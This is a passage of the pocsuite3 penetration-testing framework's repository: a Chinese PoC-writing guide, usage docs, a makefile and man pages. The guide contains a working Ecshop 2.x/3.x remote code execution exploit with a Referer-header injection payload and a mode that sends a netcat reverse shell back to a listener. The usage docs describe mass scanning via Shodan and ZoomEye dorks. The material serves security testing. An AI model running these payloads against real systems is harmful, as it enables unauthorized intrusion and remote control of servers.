将生成一长串执行指令,执行这些指令便可以反弹出一个 shell。
##### HTTP 服务内置
对于一些需要第三方 HTTP 服务才能验证的漏洞,Pocsuite3 也提供对应的API,支持在本地开启一个 HTTP 服务方便进行验证。
可查看测试用例:https://github.com/knownsec/pocsuite3/blob/master/tests/test_httpserver.py
#### PoC 代码示例<div id="PoCexample"></div>
##### PoC Python 代码示例<div id="pyexample"></div>
[Ecshop 2.x/3.x Remote Code Execution](http://www.seebug.org/vuldb/ssvid-97343) PoC:
```
import base64
from urllib.parse import urljoin
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
from requests.exceptions import ReadTimeout
class DemoPOC(POCBase):
vulID = '97343' # ssvid
version = '3.0'
author = ['seebug']
vulDate = '2018-06-14'
createDate = '2018-06-14'
updateDate = '2018-06-14'
references = ['https://www.seebug.org/vuldb/ssvid-97343']
name = 'Ecshop 2.x/3.x Remote Code Execution'
appPowerLink = ''
appName = 'ECSHOP'
appVersion = '2.x,3.x'
vulType = 'Romote Code Execution'
desc = '''
'''
samples = []
install_requires = ['']
def _verify(self):
result = {}
path = "user.php?act=login"
url = urljoin(self.url, path)
echashs = [
'554fcae493e564ee0dc75bdf2ebf94ca', # ECShop 2.x hash
'45ea207d7a2b68c49582d2d22adf953a' # ECShop 3.x hash
]
for echash in echashs:
payload = ('{0}ads|a:2:{{s:3:"num";s:116:"*/ select 1,0x2720756E696F6E202F2A,3,4,5,'
'6,7,8,0x7b24616263275d3b6563686f20706870696e666f2f2a2a2f28293b2f2f7d,10'
'-- -";s:2:"id";s:10:"\' union /*";}}{0}').format(echash)
headers = {"Referer": payload}
try:
resp = requests.get(url, headers=headers)
if resp and resp.status_code == 200 and "<title>phpinfo()</title>" in resp.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Referer'] = payload
break
except Exception as ex:
pass
return self.parse_output(result)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
def _attack(self):
return self._verify()
def _shell(self):
path = "user.php"
url = urljoin(self.url, path)
echashs = [
'554fcae493e564ee0dc75bdf2ebf94ca', # ECShop 2.x hash
'45ea207d7a2b68c49582d2d22adf953a' # ECShop 3.x hash
]
cmd = REVERSE_PAYLOAD.NC.format(get_listener_ip(), get_listener_port())
phpcode = 'passthru("{0}");'.format(cmd)
encoded_code = base64.b64encode(phpcode.encode())
postdata = {
'action': 'login',
'vulnspy': 'eval/**/(base64_decode({0}));exit;'.format(encoded_code.decode()),
'rnd': random_str(10)
}
for echash in echashs:
payload = '{0}ads|a:3:{{s:3:"num";s:207:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:2:"id";s:9:"'"'"' union/*";s:4:"name";s:3:"ads";}}{1}'.format(echash, echash)
headers = {"Referer": payload}
try:
resp = requests.post(url, data=postdata, headers=headers)
if resp and resp.status_code == 200 and "<title>phpinfo()</title>" in resp.text:
break
except ReadTimeout:
break
except Exception as ex:
pass
register_poc(DemoPOC)
```
HttpServer Demo:
```python
"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit https://pocsuite.org
"""
from http.server import SimpleHTTPRequestHandler
from pocsuite3.api import Output, POCBase, register_poc
from pocsuite3.api import PHTTPServer
class MyRequestHandler(SimpleHTTPRequestHandler):
def do_GET(self):
path = self.path
status = 404
count = 0
xxe_dtd = '''xxx'''
if path == "/xxe_dtd":
count = len(xxe_dtd)
status = 200
self.send_response(status)
self.send_header('Content-Type', 'text/html')
self.send_header('Content-Length', '{}'.format(count))
self.end_headers()
self.wfile.write(xxe_dtd.encode())
return
self.send_response(status)
self.send_header('Content-Type', 'text/html')
self.send_header("Content-Length", "{}".format(count))
self.end_headers()
def do_HEAD(self):
status = 404
if self.path.endswith('jar'):
status = 200
self.send_response(status)
self.send_header("Content-type", "text/html")
self.send_header("Content-Length", "0")
self.end_headers()
class DemoPOC(POCBase):
vulID = '' # ssvid
version = '1.0'
author = ['seebug']
vulDate = '2018-03-08'
createDate = '2018-04-12'
updateDate = '2018-04-13'
references = ['']
name = ''
appPowerLink = ''
appName = ''
appVersion = ''
vulType = ''
desc = '''
'''
samples = []
install_requires = ['']
def _verify(self):
result = {}
'''Simple http server demo
default params:
bind_ip='0.0.0.0'
bind_port=666
is_ipv6=False
use_https=False
certfile=os.path.join(paths.POCSUITE_DATA_PATH, 'cacert.pem')
requestHandler=BaseRequestHandler
You can write your own handler, default list current directory
'''
httpd = PHTTPServer(requestHandler=MyRequestHandler)
httpd.start()
# Write your code
return self.parse_output(result)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
_attack = _verify
register_poc(DemoPOC)
```
### Pocsuite3 集成调用<div id="pocsuite_import"></div>
Pocsuite3 api 提供了集成调用` pocsuite3` 的全部功能函数,可参见测试用例 `tests/test_import_pocsuite_execute.py`。典型的集成调用方法如下:
```python
from pocsuite3.api import init_pocsuite
from pocsuite3.api import start_pocsuite
from pocsuite3.api import get_results
def run_pocsuite():
# config 配置可参见命令行参数, 用于初始化 pocsuite3.lib.core.data.conf
config = {
'url': ['http://127.0.0.1:8080', 'http://127.0.0.1:21'],
'poc': ['ecshop_rce', 'ftp_burst']
}
init_pocsuite(config)
start_pocsuite()
result = get_results()
```
### PoC 规范说明<div id="PoCstandard"></div>
#### PoC 编号说明<div id="idstandard"></div>
PoC 编号 ID 与漏洞 ID 一致.
示例,漏洞库中的漏洞统一采用 “SSV-xxx” 编号的方式,则 PoC 编号为 xxx
#### PoC 命名规范<div id="namedstandard"></div>
PoC 命名分成3个部分组成漏洞应用名_版本号_漏洞类型名称 然后把文件名称中的所有字母改成小写,所有的符号改成 `_`
文件名不能有特殊字符和大写字母,最后出来的文件名应该像这样:
```
_1847_seeyon_3_1_login_info_disclosure.py
```
#### PoC 第三方模块依赖说明<div id="requires"></div>
PoC 编写的时候要求尽量不要使用第三方模块,如果必要使用,请在 PoC 的基础信息部分,增加 install_requires 字段,按照以下格式填写依赖的模块名:
```
install_requires =[str_item_, str_item, …] # 整个字段的值为 list,每个项为一个依赖模块
```
str_item 格式:模块名==版本号,模块名为 pip install 安装时的模块名(请不要填写 import 的模块名)
如果遇到安装时模块名与调用时的不一致情况,用 `:` 分割开,例如常见的加密算法库 `pycryptodome`,但是调用是以 `from Crypto.Cipher import AES`,此时就需要如下填写:
```python
install_requires = ['pycryptodome:Crypto']
```
#### PoC 结果返回规范<div id="resultstandard"></div>
result 为 PoC 返回的结果数据类型,result 返回值要求返回完整的一项,暂不符合 result 字段的情况,放入 extra 字段中,此步骤必须尽可能的保证运行者能够根据信息 复现/理解 漏洞,若果步骤复杂,在取证信息中说明。例如:
```python
# 返回数据库管理员密码
result['DBInfo']['Password']='xxxxx'
# 返回 Webshell 地址
result['ShellInfo']['URL'] = 'xxxxx'
# 返回网站管理员用户名
result['AdminInfo']['Username']='xxxxx'
```
**extra 字段说明**<div id="result_extara"></div>
extra 字段为通用结果字段的补充字段,如果需要返回的内容中不属于通用结果字段,那么可以使用 extra 字段进行赋值。extra 字段为 dict 格式,可自定义 key 进行赋值,如:
```
result['extra' ]['field'] = 'aa'
```
**特殊字段:** evidence,针对结果中返回取证信息,定义字段名只允许为 evidence,并且只能存储于 extar 字段,即:
```
result['extra' ]['evidence'] = 'aa'
```
**通用字段说明**<div id="result_common"></div>
```
result:[
{ name: 'DBInfo', value:'数据库内容' },
{ name: 'Username', value: '管理员用户名'},
{ name: 'Password', value:'管理员密码' },
{ name: 'Salt', value: '加密盐值'},
{ name: 'Uid', value: '用户ID'},
{ name: 'Groupid', value: '用户组ID'},
{ name: 'ShellInfo', value: 'Webshell信息'},
{ name: 'URL', value: 'Webshell地址'},
{ name: 'Content', value: 'Webshell内容'},
{ name: 'FileInfo', value: '文件信息'},
{ name: 'Filename', value: '文件名称'},
{ name: 'Content', value: '文件内容'},
{ name: 'XSSInfo', value: '跨站脚本信息'},
{ name: 'URL', value: '验证URL'},
{ name: 'Payload', value: '验证Payload'},
{ name: 'AdminInfo', value: '管理员信息'},
{ name: 'Uid', value: '管理员ID'},
{ name: 'Username', value: '管理员用户名'},
{ name: 'Password', value: '管理员密码'},
{ name: 'Database', value:'数据库信息' },
{ name: 'Hostname', value: '数据库主机名'},
{ name: 'Username', value:'数据库用户名' },
{ name: 'Password', value: '数据库密码'},
{ name: 'DBname', value: '数据库名'},
{ name: 'VerifyInfo', value: '验证信息'},
{ name: 'Target', value: '验证host:port'},
{ name: 'URL', value: '验证URL'},
{ name: 'Postdata', value: '验证POST数据'},
{ name: 'Path', value: '网站绝对路径'},
{ name: 'SiteAttr', value: '网站服务器信息'},
{ name: 'Process', value: '服务器进程'}
]
```
#### 漏洞类型规范<div id="vulcategory"></div>
<table border=1>
<tr><td>英文名称</td><td>中文名称</td><td>缩写</td></tr>
<tr><td>Cross Site Scripting </td><td> 跨站脚本 </td><td> xss</td></tr>
<tr><td>Cross Site Request Forgery </td><td> 跨站请求伪造 </td><td> csrf</td></tr>
<tr><td>SQL Injection </td><td> Sql注入 </td><td> sql-inj</td></tr>
<tr><td>LDAP Injection </td><td> ldap注入 </td><td> ldap-inj</td></tr>
<tr><td>Mail Command Injection </td><td> 邮件命令注入 </td><td> smtp-inj</td></tr>
<tr><td>Null Byte Injection </td><td> 空字节注入 </td><td> null-byte-inj</td></tr>
<tr><td>CRLF Injection </td><td> CRLF注入 </td><td> crlf-inj</td></tr>
<tr><td>SSI Injection </td><td> Ssi注入 </td><td> ssi-inj</td></tr>
<tr><td>XPath Injection </td><td> Xpath注入 </td><td> xpath-inj</td></tr>
<tr><td>XML Injection </td><td> Xml注入 </td><td> xml-inj</td></tr>
<tr><td>XQuery Injection </td><td> Xquery 注入 </td><td> xquery-inj</td></tr>
<tr><td>Command Execution </td><td> 命令执行 </td><td> cmd-exec</td></tr>
<tr><td>Code Execution </td><td> 代码执行 </td><td> code-exec</td></tr>
<tr><td>Remote File Inclusion </td><td> 远程文件包含 </td><td> rfi</td></tr>
<tr><td>Local File Inclusion </td><td> 本地文件包含 </td><td> lfi</td></tr>
<tr><td>Abuse of Functionality </td><td> 功能函数滥用 </td><td> func-abuse</td></tr>
<tr><td>Brute Force </td><td> 暴力破解 </td><td> brute-force</td></tr>
<tr><td>Buffer Overflow </td><td> 缓冲区溢出 </td><td> buffer-overflow</td></tr>
<tr><td>Content Spoofing </td><td> 内容欺骗 </td><td> spoofing</td></tr>
<tr><td>Credential Prediction </td><td> 证书预测 </td><td> credential-prediction</td></tr>
<tr><td>Session Prediction </td><td> 会话预测 </td><td> session-prediction</td></tr>
<tr><td>Denial of Service </td><td> 拒绝服务 </td><td> dos</td></tr>
<tr><td>Fingerprinting </td><td> 指纹识别 </td><td> finger</td></tr>
<tr><td>Format String </td><td> 格式化字符串 </td><td> format-string</td></tr>
<tr><td>HTTP Response Smuggling </td><td> http响应伪造 </td><td> http-response-smuggling</td></tr>
<tr><td>HTTP Response Splitting </td><td> http响应拆分 </td><td> http-response-splitting</td></tr>
<tr><td>HTTP Request Splitting </td><td> http请求拆分 </td><td> http-request-splitting</td></tr>
<tr><td>HTTP Request Smuggling </td><td> http请求伪造 </td><td> http-request-smuggling</td></tr>
<tr><td>HTTP Parameter Pollution </td><td> http参数污染 </td><td> hpp</td></tr>
<tr><td>Integer Overflows </td><td> 整数溢出 </td><td> int-overflow</td></tr>
<tr><td>Predictable Resource Location </td><td> 可预测资源定位 </td><td> res-location</td></tr>
<tr><td>Session Fixation </td><td> 会话固定 </td><td> session-fixation</td></tr>
<tr><td>URL Redirector Abuse </td><td> url重定向 </td><td> redirect</td></tr>
<tr><td>Privilege Escalation </td><td> 权限提升 </td><td> privilege-escalation</td></tr>
<tr><td>Resolve Error </td><td> 解析错误 </td><td> resolve-error</td></tr>
<tr><td>Arbitrary File Creation </td><td> 任意文件创建 </td><td> file-creation</td></tr>
<tr><td>Arbitrary File Download </td><td> 任意文件下载 </td><td> file-download</td></tr>
<tr><td>Arbitrary File Deletion </td><td> 任意文件删除 </td><td> file-deletion</td></tr>
<tr><td>Arbitrary File Read </td><td> 任意文件读取 </td><td> file-read</td></tr>
<tr><td>Backup File Found </td><td> 备份文件发现 </td><td> bak-file-found</td></tr>
<tr><td>Database Found </td><td> 数据库发现 </td><td> db-found</td></tr>
<tr><td>Directory Listing </td><td> 目录遍历 </td><td> dir-listing</td></tr>
<tr><td>Directory Traversal </td><td> 目录穿越 </td><td> dir-traversal</td></tr>
<tr><td>File Upload </td><td> 文件上传 </td><td> file-upload</td></tr>
<tr><td>Login Bypass </td><td> 登录绕过 </td><td> login-bypass</td></tr>
<tr><td>Weak Password </td><td> 弱密码 </td><td> weak-pass</td></tr>
<tr><td>Remote Password Change </td><td> 远程密码修改 </td><td> remote-pass-change</td></tr>
<tr><td>Code Disclosure </td><td> 代码泄漏 </td><td> code-disclosure</td></tr>
<tr><td>Path Disclosure </td><td> 路径泄漏 </td><td> path-disclosure</td></tr>
<tr><td>Information Disclosure </td><td> 信息泄漏 </td><td> info-disclosure</td></tr>
<tr><td>Security Mode Bypass </td><td> 安全模式绕过 </td><td> sec-bypass</td></tr>
<tr><td>Malware </td><td> 挂马 </td><td> mal</td></tr>
<tr><td>Black Link </td><td> 暗链 </td><td> black-link</td></tr>
<tr><td>Backdoor </td><td> 后门 </td><td> backdoor</td></tr>
<tr><td>Insecure Cookie Handling </td><td> 不安全的Cookie </td><td> insecure-cookie-handling</td></tr>
<tr><td>Shellcode </td><td> Shellcode </td><td> shellcode</td></tr>
<tr><td>Variable Coverage </td><td> 变量覆盖 </td><td> variable-coverage</td></tr>
<tr><td>Injecting Malware Codes </td><td> 恶意代码注入 </td><td> injecting-malware-codes</td></tr>
<tr><td>Upload Files </td><td> 文件上传 </td><td> upload-files</td></tr>
<tr><td>Local Overflow </td><td> 本地溢出 </td><td> local-overflow</td></tr>
<tr><td>Path Traversal </td><td> 目录穿越 </td><td> path-traversal</td></tr>
<tr><td>Unauthorized Access </td><td> 未授权访问 </td><td> unauth-access</td></tr>
<tr><td>Remote Overflow </td><td> 远程溢出 </td><td> remote-overflow</td></tr>
<tr><td>Man-in-the-middle </td><td> 中间人攻击 </td><td> mitm</td></tr>
<tr><td>Out of Memory </td><td> 内存溢出 </td><td> out-of-memory</td></tr>
<tr><td>Buffer Over-read </td><td> 缓冲区越界读 </td><td> buffer-over-read</td></tr>
<tr><td>Backup File Found </td><td> 备份文件泄漏 </td><td> backup-file-found</td></tr>
<tr><td>Use After Free </td><td> 释放后使用 </td><td> uaf</td></tr>
<tr><td>DNS Hijacking </td><td> DNS劫持 </td><td> dns-hijacking</td></tr>
<tr><td>Improper Input Validation </td><td> 不正确的输入校验 </td><td> improper-input-validation</td></tr>
<tr><td>Universal Cross-site Scripting </td><td> 通用型XSS </td><td> uxss</td></tr>
<tr><td>Server-Side Request Forgery </td><td> 服务器端请求伪造 </td><td> ssrf</td></tr>
<tr><td>Other </td><td> 其他 </td><td> other</td></tr>
</table>
也可以参见[漏洞类型规范](http://seebug.org/category)
================================================
FILE: docs/USAGE.md
================================================
# This document has stopped maintenance, please move to https://pocsuite.org
# Usage
- **pocsuite**: a cool and hackable command line program
## pocsuite
It supports three modes:
- ```verify```
- ```attack```
- ```shell```
You can also use ```pocsuite -h``` for more details.
```
usage: pocsuite [options]
optional arguments:
-h, --help show this help message and exit
--version Show program's version number and exit
--update Update Pocsuite3
-n, --new Create a PoC template
-v {0,1,2,3,4,5,6} Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be provided to define the target(s)
-u URL [URL ...], --url URL [URL ...]
Target URL/CIDR (e.g. "http://www.site.com/vuln.php?id=1")
-f URL_FILE, --file URL_FILE
Scan multiple targets given in a textual file (one per line)
-p PORTS, --ports PORTS
add additional port to each target (e.g. 8080,8443)
-r POC [POC ...] Load PoC file from local or remote from seebug website
-k POC_KEYWORD Filter PoC by keyword, e.g. ecshop
-c CONFIGFILE Load options from a configuration INI file
Mode:
Pocsuite running mode options
--verify Run poc with verify mode
--attack Run poc with attack mode
--shell Run poc with shell mode
Request:
Network request options
--cookie COOKIE HTTP Cookie header value
--host HOST HTTP Host header value
--referer REFERER HTTP Referer header value
--user-agent AGENT HTTP User-Agent header value (default random)
--proxy PROXY Use a proxy to connect to the target URL (protocol://host:port)
--proxy-cred PROXY_CRED
Proxy authentication credentials (name:password)
--timeout TIMEOUT Seconds to wait before timeout connection (default 10)
--retry RETRY Time out retrials times (default 0)
--delay DELAY Delay between two request of one thread
--headers HEADERS Extra headers (e.g. "key1: value1\nkey2: value2")
Account:
Account options
--ceye-token CEYE_TOKEN
CEye token
--oob-server OOB_SERVER
Interactsh server to use (default "interact.sh")
--oob-token OOB_TOKEN
Authentication token to connect protected interactsh server
--seebug-token SEEBUG_TOKEN
Seebug token
--zoomeye-token ZOOMEYE_TOKEN
ZoomEye token
--shodan-token SHODAN_TOKEN
Shodan token
--fofa-user FOFA_USER
Fofa user
--fofa-token FOFA_TOKEN
Fofa token
--quake-token QUAKE_TOKEN
Quake token
--hunter-token HUNTER_TOKEN
Hunter token
--censys-uid CENSYS_UID
Censys uid
--censys-secret CENSYS_SECRET
Censys secret
Modules:
Modules options
--dork DORK Zoomeye dork used for search
--dork-zoomeye DORK_ZOOMEYE
Zoomeye dork used for search
--dork-shodan DORK_SHODAN
Shodan dork used for search
--dork-fofa DORK_FOFA
Fofa dork used for search
--dork-quake DORK_QUAKE
Quake dork used for search
--dork-hunter DORK_HUNTER
Hunter dork used for search
--dork-censys DORK_CENSYS
Censys dork used for search
--max-page MAX_PAGE Max page used in search API
--search-type SEARCH_TYPE
search type used in search API, web or host
--vul-keyword VUL_KEYWORD
Seebug keyword used for search
--ssv-id SSVID Seebug SSVID number for target PoC
--lhost CONNECT_BACK_HOST
Connect back host for target PoC in shell mode
--lport CONNECT_BACK_PORT
Connect back port for target PoC in shell mode
--tls Enable TLS listener in shell mode
--comparison Compare popular web search engines
--dork-b64 Whether dork is in base64 format
Optimization:
Optimization options
-o OUTPUT_PATH, --output OUTPUT_PATH
Output file to write (JSON Lines format)
--plugins PLUGINS Load plugins to execute
--pocs-path POCS_PATH
User defined poc scripts path
--threads THREADS Max number of concurrent network requests (default 150)
--batch BATCH Automatically choose defaut choice without asking
--requires Check install_requires
--quiet Activate quiet mode, working without logger
--ppt Hiden sensitive information when published to the network
--pcap use scapy capture flow
--rule export suricata rules, default export reqeust and response
--rule-req only export request rule
--rule-filename RULE_FILENAME
Specify the name of the export rule file
Poc options:
definition options for PoC
--options Show all definition options
```
**-f, --file URLFILE**
Scan multiple targets given in a textual file
```
$ pocsuite -r pocs/poc_example.py -f url.txt --verify
```
> Attack batch processing mode only need to replace the ```--verify``` to ```--attack```.
**-r POCFILE**
POCFILE can be a file or Seebug SSVID. pocsuite plugin can load poc codes from any where.
```
$ pocsuite -r ssvid-97343 -u http://www.example.com --shell
```
**--verify**
Run poc with verify mode. PoC(s) will be only used for a vulnerability scanning.
```
$ pocsuite -r pocs/poc_example.py -u http://www.example.com/ --verify
```
**--attack**
Run poc with attack mode, PoC(s) will be exploitable, and it may allow hackers/researchers break into labs.
```
$ pocsuite -r pocs/poc_example.py -u http://www.example.com/ --attack
```
**--shell**
Run poc with shell mode, PoC will be exploitable, when PoC shellcode successfully executed, pocsuite3 will drop into interactive shell.
```
$ pocsuite -r pocs/poc_example.py -u http://www.example.com/ --shell
```
**--threads THREADS**
Using multiple threads, the default number of threads is 150
```
$ pocsuite -r pocs/poc_example.py -f url.txt --verify --threads 10
```
**--dork DORK**
If you are a [**ZoomEye**](https://www.zoomeye.org/) user, The API is a cool and hackable interface. ex:
Search redis server with ```port:6379``` and ```redis``` keyword.
```
$ pocsuite --dork 'port:6379' --vul-keyword 'redis' --max-page 2
```
**--dork-shodan DORK**
If you are a [**Shodan**](https://www.shodan.io/) user, The API is a cool and hackable interface. ex:
Search libssh server with `libssh` keyword.
```
pocsuite -r pocs/libssh_auth_bypass.py --dork-shodan libssh --threads 10
```
**--dork-fofa DORK**
If you are a [**Fofa**](fofa) user, The API is a cool and hackable interface. ex:
Search web server thinkphp with `body="thinkphp"` keyword.
```
$ pocsuite -r pocs/check_http_status.py --dork-fofa 'body="thinkphp"' --search-type web --threads 10
```
**--dork-quake DORK**
If you are a [**Quake**](quake) user, The API is a cool and hackable interface. ex:
Search web server thinkphp with `app:"ThinkPHP"` keyword.
```
$ pocsuite -r pocs/check_http_status.py --dork-quake 'app:"ThinkPHP"' --threads 10
```
**--dork-b64**
In order to solve the problem of escaping, use --dork-b64 to tell the program that you are passing in base64 encoded dork.
```
$ pocsuite --dork cG9ydDo2Mzc5 --vul-keyword 'redis' --max-page 2 --dork-b64
```
**--rule**
Export suricate rules, default export reqeust and response and The poc directory is /pocs/.
Use the --pocs-path parameter to set the directory where the poc needs to be ruled
```
$ pocsuite --rule
```
**--rule-req**
In some cases, we may only need the request rule, --rule-req only export request rule.
```
$ pocsuite --rule-req
```
If you have good ideas, please show them on your way.
## Example
```
cli mode
# basic usage, use -v to set the log level
pocsuite -u http://example.com -r example.py -v 2
# run poc with shell mode
pocsuite -u http://example.com -r example.py -v 2 --shell
# search for the target of redis service from ZoomEye and perform batch detection of vulnerabilities. The threads is set to 20
pocsuite -r redis.py --dork service:redis --threads 20
# load all poc in the poc directory and save the result as html
pocsuite -u http://example.com --plugins poc_from_pocs,html_report
# load the target from the file, and use the poc under the poc directory to scan
pocsuite -f batch.txt --plugins poc_from_pocs,html_report
# load CIDR target
pocsuite -u 10.0.0.0/24 -r example.py --plugins target_from_cidr
# the custom parameters `command` is implemented in ecshop poc, which can be set from command line options
pocsuite -u http://example.com -r ecshop_rce.py --attack --command "whoami"
console mode
poc-console
```
================================================
FILE: make.bat
================================================
cd %~dp0
python3 -m pip install .
================================================
FILE: makefile
================================================
SRC_DIR = pocsuite3
MAKE = make
.PHONY: prebuildclean install build pypimeta pypi buildupload test flake8 clean
prebuildclean:
@+python -c "import shutil; shutil.rmtree('build', True)"
@+python -c "import shutil; shutil.rmtree('dist', True)"
@+python -c "import shutil; shutil.rmtree('pocsuite3.egg-info', True)"
install:
python3 setup.py install
build:
@make prebuildclean
python3 setup.py sdist --formats=zip bdist_wheel
#python3 setup.py bdist_wininst
pypimeta:
twine register
pypi:
twine upload dist/*
buildupload:
@make build
#@make pypimeta
@make pypi
test:
tox --skip-missing-interpreters
flake8:
@+flake8 --max-line-length=120 --exclude .asv,.tox,pocsuite3/thirdparty -j 8 --count --statistics --exit-zero pocsuite3 --ignore E501,F401,F403,W503,W605
clean:
rm -rf *.egg-info dist build .tox
find $(SRC_DIR) tests -type f -name '*.pyc' -delete
================================================
FILE: manpages/poc-console.1
================================================
.TH POC-CONSOLE "1" "Nov 2022" "Manual page for poc-console"
.\"
.\" Nov 3, 2022
.\" Man page author:
.\" 13ph03nix <abcnsxyz@gmail.com>
.\"
.SH NAME
.I poc-console
\- console mode of
.B pocsuite3.
.SH Legal Disclaimer
poc-console is part of pocsuite3. Usage of pocsuite3 for attacking targets without prior mutual consent is illegal.
pocsuite3 is for security testing purposes only.
.SH SYNOPSIS
.B poc-console
.SH DESCRIPTION
.I poc-console is the console mode of pocsuite3.
.I pocsuite3
is an open-sourced remote vulnerability testing and proof-of-concept
development framework developed by the Knownsec 404 Team. It comes with a
powerful proof-of-concept engine, many nice features for the ultimate
penetration testers and security researchers.
.SH OPTIONS
poc-console do not have command line options. To see a list of available commands,
enter help at the console prompt.
.SH "SEE ALSO"
The full documentation for
.B pocsuite3
is maintained at:
.br
.I https://pocsuite.org
.PP
.SH VERSION
This manual page documents pocsuite3 version 2.0.5
.SH AUTHOR
.br
(c) 2014-present by Knownsec 404 Team
.br
<404-team@knownsec.com>
.LP
This program is free software; you may redistribute and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation; Version 2 with the clarifications and
exceptions described below. This guarantees your right to use, modify, and
redistribute this software under certain conditions. If you wish to embed
pocsuite3 technology into proprietary software, we sell alternative licenses
(contact 404-team@knownsec.com).
.PP
Manual page started by 13ph03nix
<abcnsxyz@gmail.com>
.PP
================================================
FILE: manpages/pocsuite.1
================================================
.TH POCSUITE "1" "Nov 2022" "Manual page for pocsuite"
.\"
.\" Nov 3, 2022
.\" Man page author:
.\" 13ph03nix <abcnsxyz@gmail.com>
.\"
.SH NAME
.I pocsuite3
\- open-sourced remote vulnerability testing framework.
.SH Legal Disclaimer
Usage of pocsuite3 for attacking targets without prior mutual consent is illegal.
pocsuite3 is for security testing purposes only.
.SH SYNOPSIS
.B pocsuite
\-h[elp]
.br
.B pocsuite
[options]
.br
.SH DESCRIPTION
.I pocsuite3
is an open-sourced remote vulnerability testing and proof-of-concept
development framework developed by the Knownsec 404 Team. It comes with a
powerful proof-of-concept engine, many nice features for the ultimate
penetration testers and security researchers.
.SH OPTIONS
.SS "optional arguments:"
.TP
\fB\-h\fR, \fB\-\-help\fR
show this help message and exit
.TP
\fB\-\-version\fR
Show program's version number and exit
.TP
\fB\-\-update\fR
Update Pocsuite3
.TP
\fB\-n\fR, \fB\-\-new\fR
Create a PoC template
.TP
\fB\-v\fR {0,1,2,3,4,5,6}
Verbosity level: 0\-6 (default 1)
.SS "Target:"
.IP
At least one of these options has to be provided to define the target(s)
.TP
\fB\-u\fR URL [URL ...], \fB\-\-url\fR URL [URL ...]
Target URL/CIDR (e.g. "http://www.site.com/vuln.php?id=1")
.TP
\fB\-f\fR URL_FILE, \fB\-\-file\fR URL_FILE
Scan multiple targets given in a textual file (one per line)
.TP
\fB\-p\fR PORTS, \fB\-\-ports\fR PORTS
add additional port to each target ([proto:]port, e.g. 8080,https:10000)
.TP
\fB\-s\fR
Skip target's port, only use additional port
.TP
\fB\-r\fR POC [POC ...]
Load POC file from local or remote from seebug website
.TP
\fB\-k\fR POC_KEYWORD
Filter PoC by keyword, e.g. ecshop
.TP
\fB\-c\fR CONFIGFILE
Load options from a configuration INI file
.SS "Mode:"
.IP
Pocsuite running mode options
.TP
\fB\-\-verify\fR
Run poc with verify mode
.TP
\fB\-\-attack\fR
Run poc with attack mode
.TP
\fB\-\-shell\fR
Run poc with shell mode
.SS "Request:"
.IP
Network request options
.TP
\fB\-\-cookie\fR COOKIE
HTTP Cookie header value
.TP
\fB\-\-host\fR HOST
HTTP Host header value
.TP
\fB\-\-referer\fR REFERER
HTTP Referer header value
.TP
\fB\-\-user\-agent\fR AGENT
HTTP User\-Agent header value (default random)
.TP
\fB\-\-proxy\fR PROXY
Use a proxy to connect to the target URL (protocol://host:port)
.TP
\fB\-\-proxy\-cred\fR PROXY_CRED
Proxy authentication credentials (name:password)
.TP
\fB\-\-timeout\fR TIMEOUT
Seconds to wait before timeout connection (default 10)
.TP
\fB\-\-retry\fR RETRY
Time out retrials times (default 0)
.TP
\fB\-\-delay\fR DELAY
Delay between two request of one thread
.TP
\fB\-\-headers\fR HEADERS
Extra headers (e.g. "key1: value1\enkey2: value2")
.SS "Account:"
.IP
Account options
.TP
\fB\-\-ceye\-token\fR CEYE_TOKEN
CEye token
.TP
\fB\-\-oob\-server\fR OOB_SERVER
Interactsh server to use (default "interact.sh")
.TP
\fB\-\-oob\-token\fR OOB_TOKEN
Authentication token to connect protected interactsh server
.TP
\fB\-\-seebug\-token\fR SEEBUG_TOKEN
Seebug token
.TP
\fB\-\-zoomeye\-token\fR ZOOMEYE_TOKEN
ZoomEye token
.TP
\fB\-\-shodan\-token\fR SHODAN_TOKEN
Shodan token
.TP
\fB\-\-fofa\-user\fR FOFA_USER
fofa user
.TP
\fB\-\-fofa\-token\fR FOFA_TOKEN
fofa token
.TP
\fB\-\-quake\-token\fR QUAKE_TOKEN
quake token
.TP
\fB\-\-hunter\-token\fR HUNTER_TOKEN
hunter token
.TP
\fB\-\-censys\-uid\fR CENSYS_UID
Censys uid
.TP
\fB\-\-censys\-secret\fR CENSYS_SECRET
Censys secret
.SS "Modules:"
.IP
Modules options
.TP
\fB\-\-dork\fR DORK
Zoomeye dork used for search
.TP
\fB\-\-dork\-zoomeye\fR DORK_ZOOMEYE
Zoomeye dork used for search
.TP
\fB\-\-dork\-shodan\fR DORK_SHODAN
Shodan dork used for search
.TP
\fB\-\-dork\-fofa\fR DORK_FOFA
Fofa dork used for search
.TP
\fB\-\-dork\-quake\fR DORK_QUAKE
Quake dork used for search
.TP
\fB\-\-dork\-hunter\fR DORK_HUNTER
Hunter dork used for search
.TP
\fB\-\-dork\-censys\fR DORK_CENSYS
Censys dork used for search
.TP
\fB\-\-max\-page\fR MAX_PAGE
Max page used in search API
.TP
\fB\-\-search\-type\fR SEARCH_TYPE
search type used in search API, web or host
.TP
\fB\-\-vul\-keyword\fR VUL_KEYWORD
Seebug keyword used for search
.TP
\fB\-\-ssv\-id\fR SSVID
Seebug SSVID number for target PoC
.TP
\fB\-\-lhost\fR CONNECT_BACK_HOST
Connect back host for target PoC in shell mode
.TP
\fB\-\-lport\fR CONNECT_BACK_PORT
Connect back port for target PoC in shell mode
.TP
\fB\-\-tls\fR
Enable TLS listener in shell mode
.TP
\fB\-\-comparison\fR
Compare popular web search engines
.TP
\fB\-\-dork\-b64\fR
Whether dork is in base64 format
.SS "Optimization:"
.IP
Optimization options
.TP
\fB\-o\fR OUTPUT_PATH, \fB\-\-output\fR OUTPUT_PATH
Output file to write (JSON Lines format)
.TP
